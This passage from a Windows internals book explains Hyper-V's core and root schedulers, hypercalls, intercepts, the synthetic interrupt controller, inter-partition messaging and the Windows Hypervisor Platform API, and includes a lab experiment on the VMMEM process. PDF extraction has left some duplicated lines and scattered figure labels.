layering between each other. The heart of the core scheduler is the scheduling unit, which represents a
virtual core or group of SMT VPs. (For non-SMT VMs, it represents a single VP.) Depending on the VM’s
type, the scheduling unit has either one or two threads bound to it. The hypervisor’s process owns a list
of scheduling units, which own threads backing up to VPs belonging to the VM. The scheduling unit is
the single unit of scheduling for the core scheduler to which scheduling settings—such as reservation,
weight, and cap—are applied during runtime. A scheduling unit stays active for the duration of a time
slice, can be blocked and unblocked, and can migrate between different physical processor cores. An
important concept is that the scheduling unit is analogous to a thread in the classic scheduler, but it
doesn’t have a stack or VP context in which to run. It’s one of the threads bound to a scheduling unit
that runs on a physical processor core. The thread gang scheduler is the arbiter for each scheduling unit.
It’s the entity that decides which thread from the active scheduling unit gets run by which LP from the
physical processor core. It enforces thread affinities, applies thread scheduling policies, and updates
the related counters for each thread.
Scheduler Service
Scheduler Manager
Unit Scheduler
Core Dispatcher
CPU_PLS
Scheduling Unit
Scheduling Unit
Scheduling Unit
TH_THREAD
TH_PROCESS
Logical Processor Dispatcher
Thread Gang Scheduler
FIGURE 9-14 The components of the core scheduler.
294
CHAPTER 9 Virtualization technologies
Each LP of the physical processor’s core has an instance of a logical processor dispatcher associated
with it. The logical processor dispatcher is responsible for switching threads, maintaining timers, and
flushing the VMCS (or VMCB, depending on the architecture) for the current thread. Logical proces-
sor dispatchers are owned by the core dispatcher, which represents a physical single processor core
and owns exactly two SMT LPs. The core dispatcher manages the current (active) scheduling unit. The
unit scheduler, which is bound to its own core dispatcher, decides which scheduling unit needs to run
next on the physical processor core the unit scheduler belongs to. The last important component of
the core scheduler is the scheduler manager, which owns all the unit schedulers in the system and has
a global view of all their states. It provides load balancing and ideal core assignment services to the
unit scheduler.
The root scheduler
The root scheduler (also known as integrated scheduler) was introduced in Windows 10 April 2018
Update (RS4) with the goal to allow the root partition to schedule virtual processors (VPs) belonging
to guest partitions. The root scheduler was designed with the goal to support lightweight containers
used by Windows Defender Application Guard. Those types of containers (internally called Barcelona
or Krypton containers) must be managed by the root partition and should consume a small amount of
memory and hard-disk space. (Deeply describing Krypton containers is outside the scope of this book.
You can find an introduction of server containers in Part 1, Chapter 3, “Processes and jobs”). In addition,
the root OS scheduler can readily gather metrics about workload CPU utilization inside the container
and use this data as input to the same scheduling policy applicable to all other workloads in the system.
The NT scheduler in the root partition’s OS instance manages all aspects of scheduling work to
system LPs. To achieve that, the integrated scheduler’s root component inside the VID driver creates
a VP-dispatch thread inside of the root partition (in the context of the new VMMEM process) for each
guest VP. (VA-backed VMs are discussed later in this chapter.) The NT scheduler in the root partition
schedules VP-dispatch threads as regular threads subject to additional VM/VP-specific scheduling poli-
cies and enlightenments. Each VP-dispatch thread runs a VP-dispatch loop until the VID driver termi-
nates the corresponding VP.
The VP-dispatch thread is created by the VID driver after the VM Worker Process (VMWP), which is
covered in the “Virtualization stack” section later in this chapter, has requested the partition and VPs
creation through the SETUP_PARTITION IOCTL. The VID driver communicates with the WinHvr driver,
which in turn initializes the hypervisor’s guest partition creation (through the HvCreatePartition hyper-
call). In case the created partition represents a VA-backed VM, or in case the system has the root sched-
uler active, the VID driver calls into the NT kernel (through a kernel extension) with the goal to create
the VMMEM minimal process associated with the new guest partition. The VID driver also creates a VP-
dispatch thread for each VP belonging to the partition. The VP-dispatch thread executes in the context
of the VMMEM process in kernel mode (no user mode code exists in VMMEM) and is implemented in
the VID driver (and WinHvr). As shown in Figure 9-15, each VP-dispatch thread runs a VP-dispatch loop
until the VID terminates the corresponding VP or an intercept is generated from the guest partition.
CHAPTER 9 Virtualization technologies
295
VmWp Worker
Thread
VP-Dispatch
Thread
Process the
Intercept
Intercept
Completed?
VidVpRun
Signals the
ThreadWork
Event
Waits for the
ThreadWork
Event
Run Root
Schedule
Dispatch Loop
Signals the
DispatchDone
Event
Send
HvDispatchVp
to the Hypervisor
Waits for the
DispatchDone
Event
Complete the
IOCTL and
Exit to VmWp
Calls into VID to Get
a Message
Wakes Up the VP-
dispatch Thread
YES
YES
NO
NO
*Run by the VID Driver in the
VMMEM Process Context
Wakes Up the VmWp
Worker Thread
*Using the WinHvr Driver
Intercept
Requires User-
Mode Processing
FIGURE 9-15 The root scheduler’s VP-dispatch thread and the associated VMWP worker thread
that processes the hypervisor’s messages.
While in the VP-dispatch loop, the VP-dispatch thread is responsible for the following:
1.
Call the hypervisor’s new HvDispatchVp hypercall interface to dispatch the VP on the current
processor. On each HvDispatchVp hypercall, the hypervisor tries to switch context from the cur-
rent root VP to the specified guest VP and let it run the guest code. One of the most important
characteristics of this hypercall is that the code that emits it should run at PASSIVE_LEVEL IRQL.
The hypervisor lets the guest VP run until either the VP blocks voluntarily, the VP generates an
intercept for the root, or there is an interrupt targeting the root VP. Clock interrupts are still
processed by the root partitions. When the guest VP exhausts its allocated time slice, the VP-
backing thread is preempted by the NT scheduler. On any of the three events, the hypervisor
switches back to the root VP and completes the HvDispatchVp hypercall. It then returns to the
root partition.
296
CHAPTER 9 Virtualization technologies
2.
Block on the VP-dispatch event if the corresponding VP in the hypervisor is blocked. Anytime
the guest VP is blocked voluntarily, the VP-dispatch thread blocks itself on a VP-dispatch event
until the hypervisor unblocks the corresponding guest VP and notifies the VID driver. The VID
driver signals the VP-dispatch event, and the NT scheduler unblocks the VP-dispatch thread
that can make another HvDispatchVp hypercall.
3.
Process all intercepts reported by the hypervisor on return from the dispatch hypercall. If the
guest VP generates an intercept for the root, the VP-dispatch thread processes the intercept
request on return from the HvDispatchVp hypercall and makes another HvDispatchVp request
after the VID completes processing of the intercept. Each intercept is managed differently. If
the intercept requires processing from the user mode VMWP process, the WinHvr driver exits
the loop and returns to the VID, which signals an event for the backed VMWP thread and waits
for the intercept message to be processed by the VMWP process before restarting the loop.
To properly deliver signals to VP-dispatch threads from the hypervisor to the root, the integrated
scheduler provides a scheduler message exchange mechanism. The hypervisor sends scheduler mes-
sages to the root partition via a shared page. When a new message is ready for delivery, the hypervisor
injects a SINT interrupt into the root, and the root delivers it to the corresponding ISR handler in the
WinHvr driver, which routes the message to the VID intercept callback (VidInterceptIsrCallback). The
intercept callback tries to handle the intercept message directly from the VID driver. In case the direct
handling is not possible, a synchronization event is signaled, which allows the dispatch loop to exit and
allows one of the VmWp worker threads to dispatch the intercept in user mode.
Context switches when the root scheduler is enabled are more expensive compared to other hyper-
visor scheduler implementations. When the system switches between two guest VPs, for example, it
always needs to generate two exits to the root partitions. The integrated scheduler treats hypervisor’s
root VP threads and guest VP threads very differently (they are internally represented by the same
TH_THREAD data structure, though):
I
Only the root VP thread can enqueue a guest VP thread to its physical processor. The root VP
thread has priority over any guest VP that is running or being dispatched. If the root VP is not
blocked, the integrated scheduler tries its best to switch the context to the root VP thread as
soon as possible.
I
A guest VP thread has two sets of states: thread internal states and thread root states. The thread
root states reflect the states of the VP-dispatch thread that the hypervisor communicates to
the root partition. The integrated scheduler maintains those states for each guest VP thread to
know when to send a wake-up signal for the corresponding VP-dispatch thread to the root.
Only the root VP can initiate a dispatch of a guest VP for its processor. It can do that either because
of HvDispatchVp hypercalls (in this situation, we say that the hypervisor is processing “external work”),
or because of any other hypercall that requires sending a synchronous request to the target guest VP
(this is what is defined as “internal work”). If the guest VP last ran on the current physical processor, the
CHAPTER 9 Virtualization technologies
297
scheduler can dispatch the guest VP thread right away. Otherwise, the scheduler needs to send a flush
request to the processor on which the guest VP last ran and wait for the remote processor to flush the
VP context. The latter case is defined as “migration” and is a situation that the hypervisor needs to track
(through the thread internal states and root states, which are not described here).
EXPERIMENT: Playing with the root scheduler
The NT scheduler decides when to select and run a virtual processor belonging to a VM and for
how long. This experiment demonstrates what we have discussed previously: All the VP dis-
patch threads execute in the context of the VMMEM process, created by the VID driver. For the
experiment, you need a workstation with at least Windows 10 April 2018 update (RS4) installed,
along with the Hyper-V role enabled and a VM with any operating system installed ready for use.
The procedure for creating a VM is explained in detail here: https://docs.microsoft.com/en-us/
virtualization/hyper-v-on-windows/quick-start/quick-create-virtual-machine.
First, you should verify that the root scheduler is enabled. Details on the procedure are avail-
able in the “Controlling the hypervisor’s scheduler type” experiment earlier in this chapter. The
VM used for testing should be powered down.
Open the Task Manager by right-clicking on the task bar and selecting Task Manager, click the
Details sheet, and verify how many VMMEM processes are currently active. In case no VMs are
running, there should be none of them; in case the Windows Defender Application Guard (WDAG)
role is installed, there could be an existing VMMEM process instance, which hosts the preloaded
WDAG container. (This kind of VM is described later in the “VA-backed virtual machines” section.) In
case a VMMEM process instance exists, you should take note of its process ID (PID).
Open the Hyper-V Manager by typing Hyper-V Manager in the Cortana search box and start
your virtual machine. After the VM has been started and the guest operating system has success-
fully booted, switch back to the Task Manager and search for a new VMMEM process. If you click
the new VMMEM process and expand the User Name column, you can see that the process has
been associated with a token owned by a user named as the VM’s GUID. You can obtain your VM’s
GUID by executing the following command in an administrative PowerShell window (replace the
term “<VmName>” with the name of your VM):
Get-VM -VmName "<VmName>" | ft VMName, VmId
EXPERIMENT: Playing with the root scheduler
The NT scheduler decides when to select and run a virtual processor belonging to a VM and for
how long. This experiment demonstrates what we have discussed previously: All the VP dis-
patch threads execute in the context of the VMMEM process, created by the VID driver. For the
experiment, you need a workstation with at least Windows 10 April 2018 update (RS4) installed,
along with the Hyper-V role enabled and a VM with any operating system installed ready for use.
The procedure for creating a VM is explained in detail here: https://docs.microsoft.com/en-us/
virtualization/hyper-v-on-windows/quick-start/quick-create-virtual-machine.
First, you should verify that the root scheduler is enabled. Details on the procedure are avail-
able in the “Controlling the hypervisor’s scheduler type” experiment earlier in this chapter. The
VM used for testing should be powered down.
Open the Task Manager by right-clicking on the task bar and selecting Task Manager, click the
Task Manager, click the
Task Manager
Details sheet, and verify how many VMMEM processes are currently active. In case no VMs are
running, there should be none of them; in case the Windows Defender Application Guard (WDAG)
role is installed, there could be an existing VMMEM process instance, which hosts the preloaded
WDAG container. (This kind of VM is described later in the “VA-backed virtual machines” section.) In
case a VMMEM process instance exists, you should take note of its process ID (PID).
Open the Hyper-V Manager by typing Hyper-V Manager in the Cortana search box and start
Hyper-V Manager in the Cortana search box and start
Hyper-V Manager
your virtual machine. After the VM has been started and the guest operating system has success-
fully booted, switch back to the Task Manager and search for a new VMMEM process. If you click
the new VMMEM process and expand the User Name column, you can see that the process has
been associated with a token owned by a user named as the VM’s GUID. You can obtain your VM’s
GUID by executing the following command in an administrative PowerShell window (replace the
term “<VmName>” with the name of your VM):
Get-VM -VmName "<VmName>" | ft VMName, VmId
298
CHAPTER 9 Virtualization technologies
The VM ID and the VMMEM process’s user name should be the same, as shown in the follow-
ing figure.
Install Process Explorer (by downloading it from https://docs.microsoft.com/en-us/sysin-
ternals/downloads/process-explorer), and run it as administrator. Search the PID of the correct
VMMEM process identified in the previous step (27312 in the example), right-click it, and select
Suspend”. The CPU tab of the VMMEM process should now show “Suspended” instead of the
correct CPU time.
If you switch back to the VM, you will find that it is unresponsive and completely stuck. This is
because you have suspended the process hosting the dispatch threads of all the virtual proces-
sors belonging to the VM. This prevented the NT kernel from scheduling those threads, which
won’t allow the WinHvr driver to emit the needed HvDispatchVp hypercall used to resume the
VP execution.
If you right-click the suspended VMMEM and select Resume, your VM resumes its execution
and continues to run correctly.
The VM ID and the VMMEM process’s user name should be the same, as shown in the follow-
ing figure.
Install Process Explorer (by downloading it from https://docs.microsoft.com/en-us/sysin-
ternals/downloads/process-explorer), and run it as administrator. Search the PID of the correct
ternals/downloads/process-explorer), and run it as administrator. Search the PID of the correct
ternals/downloads/process-explorer
VMMEM process identified in the previous step (27312 in the example), right-click it, and select
Suspend”. The CPU tab of the VMMEM process should now show “Suspended” instead of the
correct CPU time.
If you switch back to the VM, you will find that it is unresponsive and completely stuck. This is
because you have suspended the process hosting the dispatch threads of all the virtual proces-
sors belonging to the VM. This prevented the NT kernel from scheduling those threads, which
won’t allow the WinHvr driver to emit the needed HvDispatchVp hypercall used to resume the
VP execution.
If you right-click the suspended VMMEM and select Resume, your VM resumes its execution
and continues to run correctly.
CHAPTER 9 Virtualization technologies
299
Hypercalls and the hypervisor TLFS
Hypercalls provide a mechanism to the operating system running in the root or the in the child parti-
tion to request services from the hypervisor. Hypercalls have a well-defined set of input and output
parameters. The hypervisor Top Level Functional Specification (TLFS) is available online (https://docs
.microsoft.com/en-us/virtualization/hyper-v-on-windows/reference/tlfs); it defines the different call-
ing conventions used while specifying those parameters. Furthermore, it lists all the publicly available
hypervisor features, partition’s properties, hypervisor, and VSM interfaces.
Hypercalls are available because of a platform-dependent opcode (VMCALL for Intel systems,
VMMCALL for AMD, HVC for ARM64) which, when invoked, always cause a VM_EXIT into the hypervi-
sor. VM_EXITs are events that cause the hypervisor to restart to execute its own code in the hypervisor
privilege level, which is higher than any other software running in the system (except for firmware’s
SMM context), while the VP is suspended. VM_EXIT events can be generated from various reasons. In
the platform-specific VMCS (or VMCB) opaque data structure the hardware maintains an index that
specifies the exit reason for the VM_EXIT. The hypervisor gets the index, and, in case of an exit caused
by a hypercall, reads the hypercall input value specified by the caller (generally from a CPU’s general-
purpose register—RCX in the case of 64-bit Intel and AMD systems). The hypercall input value (see
Figure 9-16) is a 64-bit value that specifies the hypercall code, its properties, and the calling convention
used for the hypercall. Three kinds of calling conventions are available:
I
Standard hypercalls Store the input and output parameters on 8-byte aligned guest physical
addresses (GPAs). The OS passes the two addresses via general-purposes registers (RDX and R8
on Intel and AMD 64-bit systems).
I
Fast hypercalls Usually don’t allow output parameters and employ the two general-purpose
registers used in standard hypercalls to pass only input parameters to the hypervisor (up to
16 bytes in size).
I
Extended fast hypercalls (or XMM fast hypercalls) Similar to fast hypercalls, but these use an
additional six floating-point registers to allow the caller to pass input parameters up to 112 bytes
in size.
RsvdZ
(4 bits)
63:60
RsvdZ
(4 bits)
47:44
RsvdZ
(5 bits)
31:27
Fast
(1 bit)
16
Rep start index
(12 bits)
59:48
Variable
header size
(9 bits)
26:17
Call Code
(16 bits)
15:0
Rep count
(12 bits)
43:32
FIGURE 9-16 The hypercall input value (from the hypervisor TLFS).
There are two classes of hypercalls: simple and rep (which stands for “repeat”). A simple hypercall
performs a single operation and has a fixed-size set of input and output parameters. A rep hypercall
acts like a series of simple hypercalls. When a caller initially invokes a rep hypercall, it specifies a rep
count that indicates the number of elements in the input or output parameter list. Callers also specify
a rep start index that indicates the next input or output element that should be consumed.
300
CHAPTER 9 Virtualization technologies
All hypercalls return another 64-bit value called hypercall result value (see Figure 9-17). Generally,
the result value describes the operation’s outcome, and, for rep hypercalls, the total number of com-
pleted repetition.
Rsvd
(20 bits)
63:40
Rsvd
(16 bits)
31:16
Rep
complete
(12 bits)
43:32
Result
(16 bits)
15:0
FIGURE 9-17 The hypercall result value (from the hypervisor TLFS).
Hypercalls could take some time to be completed. Keeping a physical CPU that doesn‘t receive
interrupts can be dangerous for the host OS. For example, Windows has a mechanism that detects
whether a CPU has not received its clock tick interrupt for a period of time longer than 16 milliseconds.
If this condition is detected, the system is suddenly stopped with a BSOD. The hypervisor therefore
relies on a hypercall continuation mechanism for some hypercalls, including all rep hypercall forms. If
a hypercall isn’t able to complete within the prescribed time limit (usually 50 microseconds), control is
returned back to the caller (through an operation called VM_ENTRY), but the instruction pointer is not
advanced past the instruction that invoked the hypercall. This allows pending interrupts to be handled
and other virtual processors to be scheduled. When the original calling thread resumes execution, it
will re-execute the hypercall instruction and make forward progress toward completing the operation.
A driver usually never emits a hypercall directly through the platform-dependent opcode.
Instead, it uses services exposed by the Windows hypervisor interface driver, which is available in
two different versions:
I
WinHvr.sys Loaded at system startup if the OS is running in the root partition and exposes
hypercalls available in both the root and child partition.
I
WinHv.sys Loaded only when the OS is running in a child partition. It exposes hypercalls
available in the child partition only.
Routines and data structures exported by the Windows hypervisor interface driver are extensively
used by the virtualization stack, especially by the VID driver, which, as we have already introduced,
covers a key role in the functionality of the entire Hyper-V platform.
Intercepts
The root partition should be able to create a virtual environment that allows an unmodified guest OS,
which was written to execute on physical hardware, to run in a hypervisor’s guest partition. Such legacy
guests may attempt to access physical devices that do not exist in a hypervisor partition (for example,
by accessing certain I/O ports or by writing to specific MSRs). For these cases, the hypervisor provides
the host intercepts facility; when a VP of a guest VM executes certain instructions or generates certain
exceptions, the authorized root partition can intercept the event and alter the effect of the intercepted
instruction such that, to the child, it mirrors the expected behavior in physical hardware.
CHAPTER 9 Virtualization technologies
301
When an intercept event occurs in a child partition, its VP is suspended, and an intercept message
is sent to the root partition by the Synthetic Interrupt Controller (SynIC; see the following section
for more details) from the hypervisor. The message is received thanks to the hypervisor’s Synthetic
ISR (Interrupt Service Routine), which the NT kernel installs during phase 0 of its startup only in case
the system is enlightened and running under the hypervisor (see Chapter 12 for more details). The
hypervisor synthetic ISR (KiHvInterrupt), usually installed on vector 0x30, transfers its execution
to an external callback, which the VID driver has registered when it started (through the exposed
HvlRegisterInterruptCallback NT kernel API).
The VID driver is an intercept driver, meaning that it is able to register host intercepts with the
hypervisor and thus receives all the intercept events that occur on child partitions. After the partition
is initialized, the WM Worker process registers intercepts for various components of the virtualization
stack. (For example, the virtual motherboard registers I/O intercepts for each virtual COM ports of the
VM.) It sends an IOCTL to the VID driver, which uses the HvInstallIntercept hypercall to install the inter-
cept on the child partition. When the child partition raises an intercept, the hypervisor suspends the VP
and injects a synthetic interrupt in the root partition, which is managed by the KiHvInterrupt ISR. The
latter routine transfers the execution to the registered VID Intercept callback, which manages the event
and restarts the VP by clearing the intercept suspend synthetic register of the suspended VP.
The hypervisor supports the interception of the following events in the child partition:
I
Access to I/O ports (read or write)
I
Access to VP’s MSR (read or write)
I
Execution of CPUID instruction
I
Exceptions
I
Accesses to general purposes registers
I
Hypercalls
The synthetic interrupt controller (SynIC)
The hypervisor virtualizes interrupts and exceptions for both the root and guest partitions through
the synthetic interrupt controller (SynIC), which is an extension of a virtualized local APIC (see the Intel
or AMD software developer manual for more details about the APIC). The SynIC is responsible for
dispatching virtual interrupts to virtual processors (VPs). Interrupts delivered to a partition fall into two
categories: external and synthetic (also known as internal or simply virtual interrupts). External inter-
rupts originate from other partitions or devices; synthetic interrupts are originated from the hypervisor
itself and are targeted to a partition’s VP.
When a VP in a partition is created, the hypervisor creates and initializes a SynIC for each supported
VTL. It then starts the VTL 0’s SynIC, which means that it enables the virtualization of a physical CPU’s
302
CHAPTER 9 Virtualization technologies
APIC in the VMCS (or VMCB) hardware data structure. The hypervisor supports three kinds of APIC
virtualization while dealing with external hardware interrupts:
I
In standard configuration, the APIC is virtualized through the event injection hardware support.
This means that every time a partition accesses the VP’s local APIC registers, I/O ports, or MSRs
(in the case of x2APIC), it produces a VMEXIT, causing hypervisor codes to dispatch the inter-
rupt through the SynIC, which eventually “injects” an event to the correct guest VP by manipu-
lating VMCS/VMCB opaque fields (after it goes through the logic similar to a physical APIC,
which determines whether the interrupt can be delivered).
I
The APIC emulation mode works similar to the standard configuration. Every physical inter-
rupt sent by the hardware (usually through the IOAPIC) still causes a VMEXIT, but the hypervi-
sor does not have to inject any event. Instead, it manipulates a virtual-APIC page used by the
processor to virtualize certain access to the APIC registers. When the hypervisor wants to inject
an event, it simply manipulates some virtual registers mapped in the virtual-APIC page. The
event is delivered by the hardware when a VMENTRY happens. At the same time, if a guest VP
manipulates certain parts of its local APIC, it does not produce any VMEXIT, but the modifica-
tion will be stored in the virtual-APIC page.
I
Posted interrupts allow certain kinds of external interrupts to be delivered directly in the guest
partition without producing any VMEXIT. This allows direct access devices to be mapped directly
in the child partition without incurring any performance penalties caused by the VMEXITs. The
physical processor processes the virtual interrupts by directly recording them as pending on the
virtual-APIC page. (For more details, consult the Intel or AMD software developer manual.)
When the hypervisor starts a processor, it usually initializes the synthetic interrupt controller module
for the physical processor (represented by a CPU_PLS data structure). The SynIC module of the physical
processor is an array of an interrupt’s descriptors, which make the connection between a physical inter-
rupt and a virtual interrupt. A hypervisor interrupt descriptor (IDT entry), as shown in Figure 9-18, contains
the data needed for the SynIC to correctly dispatch the interrupt, in particular the entity the interrupt is
delivered to (a partition, the hypervisor, a spurious interrupt), the target VP (root, a child, multiple VPs, or
a synthetic interrupt), the interrupt vector, the target VTL, and some other interrupt characteristics.
Dispatch Type
Target VP & VTL
Virtual Vector
Interrupt
Characteristics
Hypervisor
Reserved
FIGURE 9-18 The hypervisor physical interrupt descriptor.
CHAPTER 9 Virtualization technologies
303
In default configurations, all the interrupts are delivered to the root partition in VTL 0 or to the
hypervisor itself (in the second case, the interrupt entry is Hypervisor Reserved). External interrupts
can be delivered to a guest partition only when a direct access device is mapped into a child partition;
NVMe devices are a good example.
Every time the thread backing a VP is selected for being executed, the hypervisor checks whether
one (or more) synthetic interrupt needs to be delivered. As discussed previously, synthetic interrupts
aren’t generated by any hardware; they’re usually generated from the hypervisor itself (under certain
conditions), and they are still managed by the SynIC, which is able to inject the virtual interrupt to the
correct VP. Even though they’re extensively used by the NT kernel (the enlightened clock timer is a
good example), synthetic interrupts are fundamental for the Virtual Secure Mode (VSM). We discuss
them in in the section “The Secure Kernel” later in this chapter.
The root partition can send a customized virtual interrupt to a child by using the HvAssertVirtualInterrupt
hypercall (documented in the TLFS).
Inter-partition communication
The synthetic interrupt controller also has the important role of providing inter-partition communica-
tion facilities to the virtual machines. The hypervisor provides two principal mechanisms for one parti-
tion to communicate with another: messages and events. In both cases, the notifications are sent to the
target VP using synthetic interrupts. Messages and events are sent from a source partition to a target
partition through a preallocated connection, which is associated with a destination port.
One of the most important components that uses the inter-partition communication services pro-
vided by the SynIC is VMBus. (VMBus architecture is discussed in the “Virtualization stack” section later
in this chapter.) The VMBus root driver (Vmbusr.sys) in the root allocates a port ID (ports are identified
by a 32-bit ID) and creates a port in the child partition by emitting the HvCreatePort hypercall through
the services provided by the WinHv driver.
A port is allocated in the hypervisor from the receiver’s memory pool. When a port is created, the
hypervisor allocates sixteen message buffers from the port memory. The message buffers are main-
tained in a queue associated with a SINT (synthetic interrupt source) in the virtual processor’s SynIC.
The hypervisor exposes sixteen interrupt sources, which can allow the VMBus root driver to manage a
maximum of 16 message queues. A synthetic message has the fixed size of 256 bytes and can transfer
only 240 bytes (16 bytes are used as header). The caller of the HvCreatePort hypercall specifies which
virtual processor and SINT to target.
To correctly receive messages, the WinHv driver allocates a synthetic interrupt message page
(SIMP), which is then shared with the hypervisor. When a message is enqueued for a target partition,
the hypervisor copies the message from its internal queue to the SIMP slot corresponding to the cor-
rect SINT. The VMBus root driver then creates a connection, which associates the port opened in the
child VM to the parent, through the HvConnectPort hypercall. After the child has enabled the recep-
tion of synthetic interrupts in the correct SINT slot, the communication can start; the sender can post
a message to the client by specifying a target Port ID and emitting the HvPostMessage hypercall. The
hypervisor injects a synthetic interrupt to the target VP, which can read from the message page (SIMP)
the content of the message.
304
CHAPTER 9 Virtualization technologies
The hypervisor supports ports and connections of three types:
I
Message ports Transmit 240-byte messages from and to a partition. A message port is as-
sociated with a single SINT in the parent and child partition. Messages will be delivered in order
through a single port message queue. This characteristic makes messages ideal for VMBus
channel setup and teardown (further details are provided in the “Virtualization stack” section
later in this chapter).
I
Event ports Receive simple interrupts associated with a set of flags, set by the hypervisor
when the opposite endpoint makes a HvSignalEvent hypercall. This kind of port is normally
used as a synchronization mechanism. VMBus, for example, uses an event port to notify that a
message has been posted on the ring buffer described by a particular channel. When the event
interrupt is delivered to the target partition, the receiver knows exactly to which channel the
interrupt is targeted thanks to the flag associated with the event.
I
Monitor ports An optimization to the Event port. Causing a VMEXIT and a VM context switch
for every single HvSignalEvent hypercall is an expensive operation. Monitor ports are set up by
allocating a shared page (between the hypervisor and the partition) that contains a data struc-
ture indicating which event port is associated with a particular monitored notification flag (a bit
in the page). In that way, when the source partition wants to send a synchronization interrupt, it
can just set the corresponding flag in the shared page. Sooner or later the hypervisor will notice
the bit set in the shared page and will trigger an interrupt to the event port.
The Windows hypervisor platform API and EXO partitions
Windows increasingly uses Hyper-V’s hypervisor for providing functionality not only related to running
traditional VMs. In particular, as we will discuss discuss in the second part of this chapter, VSM, an im-
portant security component of modern Windows versions, leverages the hypervisor to enforce a higher
level of isolation for features that provide critical system services or handle secrets such as passwords.
Enabling these features requires that the hypervisor is running by default on a machine.
External virtualization products, like VMware, Qemu, VirtualBox, Android Emulator, and many oth-
ers use the virtualization extensions provided by the hardware to build their own hypervisors, which is
needed for allowing them to correctly run. This is clearly not compatible with Hyper-V, which launches
its hypervisor before the Windows kernel starts up in the root partition (the Windows hypervisor is a
native, or bare-metal hypervisor).
As for Hyper-V, external virtualization solutions are also composed of a hypervisor, which provides
generic low-level abstractions for the processor’s execution and memory management of the VM, and a
virtualization stack, which refers to the components of the virtualization solution that provide the emu-
lated environment for the VM (like its motherboard, firmware, storage controllers, devices, and so on).
The Windows Hypervisor Platform API, which is documented at https://docs.microsoft.com/en-us
/virtualization/api/, has the main goal to enable running third-party virtualization solutions on the
Windows hypervisor. Specifically, a third-party virtualization product should be able to create, delete,
start, and stop VMs with characteristics (firmware, emulated devices, storage controllers) defined by its
CHAPTER 9 Virtualization technologies
305
own virtualization stack. The third-party virtualization stack, with its management interfaces, continues
to run on Windows in the root partition, which allows for an unchanged use of its VMs by their client.
As shown in Figure 9-19, all the Windows hypervisor platform’s APIs run in user mode and are
implemented on the top of the VID and WinHvr driver in two libraries: WinHvPlatform.dll and
WinHvEmulation.dll (the latter implements the instruction emulator for MMIO).
Virtualization Stack Process
WinHvr
Hypervisor Instruction
Emulator
Windows Hypervisor
Platform API
CreateThread
WinHv
DispatchVp
Intercept
Routine
WinHvMap
GpaPages
VirtualAlloc
WHvRun VirtualProcessor
VID driver
MicroVm
WHvMapGpaRange
User
Kernel
MapViewOfFile
Root Partition
Guest Partition
Guest VPs
GPA Space
Hypervisor
FIGURE 9-19 The Windows hypervisor platform API architecture.
A user mode application that wants to create a VM and its relative virtual processors usually should
do the following:
1.
Create the partition in the VID library (Vid.dll) with the WHvCreatePartition API.
2.
Configure various internal partition’s properties—like its virtual processor count, the APIC emula-
tion mode, the kind of requested VMEXITs, and so on—using the WHvSetPartitionProperty API.
3.
Create the partition in the VID driver and the hypervisor using the WHvSetupPartition API. (This
kind of partition in the hypervisor is called an EXO partition, as described shortly.) The API also
creates the partition’s virtual processors, which are created in a suspended state.
4.
Create the corresponding virtual processor(s) in the VID library through the WHvCreateVirtual-
Processor API. This step is important because the API sets up and maps a message buffer into
the user mode application, which is used for asynchronous communication with the hypervisor
and the thread running the virtual CPUs.
5.
Allocate the address space of the partition by reserving a big range of virtual memory with the
classic VirtualAlloc function (read more details in Chapter 5 of Part 1) and map it in the hy-
pervisor through the WHvMapGpaRange API. A fine-grained protection of the guest physical
memory can be specified when allocating guest physical memory in the guest virtual address
space by committing different ranges of the reserved virtual memory.
306
CHAPTER 9 Virtualization technologies
6.
Create the page-tables and copy the initial firmware code in the committed memory.
7.
Set the initial VP’s registers content using the WHvSetVirtualProcessorRegisters API.
8.
Run the virtual processor by calling the WHvRunVirtualProcessor blocking API. The function
returns only when the guest code executes an operation that requires handling in the virtual-
ization stack (a VMEXIT in the hypervisor has been explicitly required to be managed by the
third-party virtualization stack) or because of an external request (like the destroying of the
virtual processor, for example).
The Windows hypervisor platform APIs are usually able to call services in the hypervisor by sending
different IOCTLs to the \Device\VidExo device object, which is created by the VID driver at initialization
time, only if the HKLM\System\CurrentControlSet\Services\Vid\Parameters\ExoDeviceEnabled registry
value is set to 1. Otherwise, the system does not enable any support for the hypervisor APIs.
Some performance-sensitive hypervisor platform APIs (a good example is provided by WHvRun
VirtualProcessor) can instead call directly into the hypervisor from user mode thanks to the Doorbell
page, which is a special invalid guest physical page, that, when accessed, always causes a VMEXIT. The
Windows hypervisor platform API obtains the address of the doorbell page from the VID driver. It
writes to the doorbell page every time it emits a hypercall from user mode. The fault is identified and
treated differently by the hypervisor thanks to the doorbell page’s physical address, which is marked
as “special” in the SLAT page table. The hypervisor reads the hypercall’s code and parameters from the
VP’s registers as per normal hypercalls, and ultimately transfers the execution to the hypercall’s handler
routine. When the latter finishes its execution, the hypervisor finally performs a VMENTRY, landing on
the instruction following the faulty one. This saves a lot of clock cycles to the thread backing the guest
VP, which no longer has a need to enter the kernel for emitting a hypercall. Furthermore, the VMCALL
and similar opcodes always require kernel privileges to be executed.
The virtual processors of the new third-party VM are dispatched using the root scheduler. In case
the root scheduler is disabled, any function of the hypervisor platform API can’t run. The created parti-
tion in the hypervisor is an EXO partition. EXO partitions are minimal partitions that don’t include any
synthetic functionality and have certain characteristics ideal for creating third-party VMs:
I
They are always VA-backed types. (More details about VA-backed or micro VMs are provided
later in the “Virtualization stack” section.) The partition’s memory-hosting process is the user
mode application, which created the VM, and not a new instance of the VMMEM process.
I
They do not have any partition’s privilege or support any VTL (virtual trust level) other than 0.
All of a classical partition’s privileges refer to synthetic functionality, which is usually exposed
by the hypervisor to the Hyper-V virtualization stack. EXO partitions are used for third-party
virtualization stacks. They do not need the functionality brought by any of the classical parti-
tion’s privilege.
I
They manually manage timing. The hypervisor does not provide any virtual clock interrupt
source for EXO partition. The third-party virtualization stack must take over the responsibil-
ity of providing this. This means that every attempt to read the virtual processor’s time-stamp
counter will cause a VMEXIT in the hypervisor, which will route the intercept to the user mode
thread that runs the VP.
CHAPTER 9 Virtualization technologies
307
Note EXO partitions include other minor differences compared to classical hypervisor parti-
tions. For the sake of the discussion, however, those minor differences are irrelevant, so they
are not mentioned in this book.
Nested virtualization
Large servers and cloud providers sometimes need to be able to run containers or additional virtual
machines inside a guest partition. Figure 9-20 describes this scenario: The hypervisor that runs on
the top of the bare-metal hardware, identified as the L0 hypervisor (L0 stands for Level 0), uses the
virtualization extensions provided by the hardware to create a guest VM. Furthermore, the L0 hypervi-
sor emulates the processor’s virtualization extensions and exposes them to the guest VM (the ability to
expose virtualization extensions is called nested virtualization). The guest VM can decide to run another
